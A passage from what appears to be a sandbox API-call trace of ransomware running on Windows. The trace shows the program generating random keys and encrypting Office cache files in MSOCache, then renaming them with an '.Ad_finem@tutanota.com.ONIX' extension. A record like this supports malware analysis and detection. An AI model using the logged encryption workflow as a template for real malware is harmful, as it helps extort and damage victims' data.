Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1 [0110.234] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78 [0110.234] GetProcessHeap () returned 0x410000 [0110.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0110.234] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0110.234] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0110.234] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1992192) returned 1 [0110.234] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1e6600 [0110.234] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0110.234] GetProcessHeap () returned 0x410000 [0110.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0110.234] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0110.234] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0110.236] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0110.238] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6600) returned 0x3680020 [0110.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6600) returned 0x3870020 [0110.239] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.239] ReadFile (in: hFile=0x494, lpBuffer=0x3680020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x1e6600, lpOverlapped=0x0) returned 1 [0110.341] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1e6600, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0110.341] CloseHandle (hObject=0x494) returned 1 [0110.342] GetProcessHeap () returned 0x410000 [0110.342] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0110.342] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0110.345] GetProcessHeap () returned 0x410000 [0110.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0110.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0110.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0110.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0110.345] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0110.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.345] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.345] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0110.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.345] GetLastError () returned 0x0 [0110.345] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0110.345] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0110.346] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10b2, nNumberOfBytesToLockHigh=0x0) returned 1 [0110.346] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.346] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0110.347] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.347] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.347] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0110.347] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0110.347] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0110.348] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78 [0110.348] GetProcessHeap () returned 0x410000 [0110.348] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0110.348] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0110.348] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0110.348] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4274) returned 1 [0110.348] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10b2 [0110.348] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0110.348] GetProcessHeap () returned 0x410000 [0110.348] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0110.348] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0110.348] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0110.350] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0110.351] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.352] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b2) returned 0x4d8b68 [0110.352] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b2) returned 0x4d9c28 [0110.352] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.352] ReadFile (in: hFile=0x494, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x10b2, lpOverlapped=0x0) returned 1 [0110.352] SetFilePointer (in: hFile=0x494, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.352] WriteFile (in: hFile=0x494, lpBuffer=0x4d9c28*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9c28*, lpNumberOfBytesWritten=0x367f44c*=0x10b2, lpOverlapped=0x0) returned 1 [0110.353] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0110.353] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9c28 | out: hHeap=0x410000) returned 1 [0110.353] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10b2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0110.353] CloseHandle (hObject=0x494) returned 1 [0110.354] GetProcessHeap () returned 0x410000 [0110.354] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0110.354] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0110.359] GetProcessHeap () returned 0x410000 [0110.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0110.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0110.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0110.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0110.359] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0110.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.359] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.359] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0110.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.359] GetLastError () returned 0x0 [0110.360] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0110.360] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0110.360] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2a968, nNumberOfBytesToLockHigh=0x0) returned 1 [0110.360] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.360] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0110.362] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.362] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.362] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0110.362] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0110.362] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1 [0110.362] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71 [0110.362] GetProcessHeap () returned 0x410000 [0110.362] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfe) returned 0x4d6b80 [0110.362] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" [0110.362] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0110.362] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=174440) returned 1 [0110.362] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2a968 [0110.362] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0110.362] GetProcessHeap () returned 0x410000 [0110.362] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6c88 [0110.362] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0110.363] WriteFile (in: hFile=0x494, lpBuffer=0x4d6c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0110.364] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0110.365] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.366] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2a968) returned 0xf50048 [0110.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2a968) returned 0xf7a9b8 [0110.367] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.367] ReadFile (in: hFile=0x494, lpBuffer=0xf50048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x2a968, lpOverlapped=0x0) returned 1 [0110.374] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2a968, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0110.374] CloseHandle (hObject=0x494) returned 1 [0110.381] GetProcessHeap () returned 0x410000 [0110.381] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6c88 | out: hHeap=0x410000) returned 1 [0110.381] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0110.383] GetProcessHeap () returned 0x410000 [0110.383] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0110.383] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0110.383] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0110.383] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0110.383] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0110.383] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.383] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.383] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0110.383] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.383] GetLastError () returned 0x0 [0110.383] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0110.383] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0110.384] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x709768, nNumberOfBytesToLockHigh=0x0) returned 1 [0110.384] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.384] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0110.386] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.386] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.386] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0110.386] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0110.386] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1 [0110.386] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74 [0110.386] GetProcessHeap () returned 0x410000 [0110.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x104) returned 0x467908 [0110.386] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" [0110.386] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0110.386] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=7378792) returned 1 [0110.386] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x709768 [0110.386] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0110.386] GetProcessHeap () returned 0x410000 [0110.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0110.386] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0110.389] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0110.390] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0110.391] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.392] 